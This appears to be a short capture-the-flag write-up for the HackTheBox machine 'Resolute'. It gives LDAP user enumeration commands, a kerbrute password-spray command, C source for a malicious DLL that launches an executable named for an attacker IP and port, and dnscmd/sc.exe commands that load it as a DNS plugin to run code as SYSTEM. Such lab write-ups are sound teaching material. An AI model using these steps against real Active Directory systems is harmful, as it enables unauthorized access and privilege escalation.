Resolute @ HackTheBox
Resolute is a 30-point Windows machine on HackTheBox that involves enumerating LDAP, Password Spraying, and using the DNSAdmins group to register a custom plugin DLL which allows us to execute code as SYSTEM.
Notes
Windapsearch
1
2
3
4
windapsearch --dc resolute.htb -m users
windapsearch --dc resolute.htb -m users --full
windapsearch --dc resolute.htb -m users --attrs description
windapsearch --dc resolute.htb -m users --attrs sAMAccountName | grep sAMAccountName | cut -d " " -f2 | tee users.txt
https://github.com/ropnop/windapsearch
Kerbrute
1
kerbrute passwordspray -d megabank.local --dc resolute.htb users.txt 'Welcome123!'
https://github.com/ropnop/kerbrute
DNSAdmins Exploit
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
#include "pch.h"
BOOL APIENTRY DllMain( HMODULE hModule,
DWORD ul_reason_for_call,
LPVOID lpReserved
)
{
switch (ul_reason_for_call)
{
case DLL_PROCESS_ATTACH:
WinExec("C:\\programdata\\xc_10.10.14.4_1337.exe", 0);
case DLL_THREAD_ATTACH:
case DLL_THREAD_DETACH:
case DLL_PROCESS_DETACH:
break;
}
return TRUE;
}
1
2
3
4
dnscmd resolute /config /serverlevelplugindll c:\programdata\xct.dll
Get-ItemProperty HKLM:\SYSTEM\CurrentControlSet\Services\DNS\Parameters\ -Name ServerLevelPluginDll
sc.exe \\resolute stop dns
sc.exe \\resolute start dns
Thanks egre55 for creating this fun box!
This post is licensed under CC BY 4.0 by the author.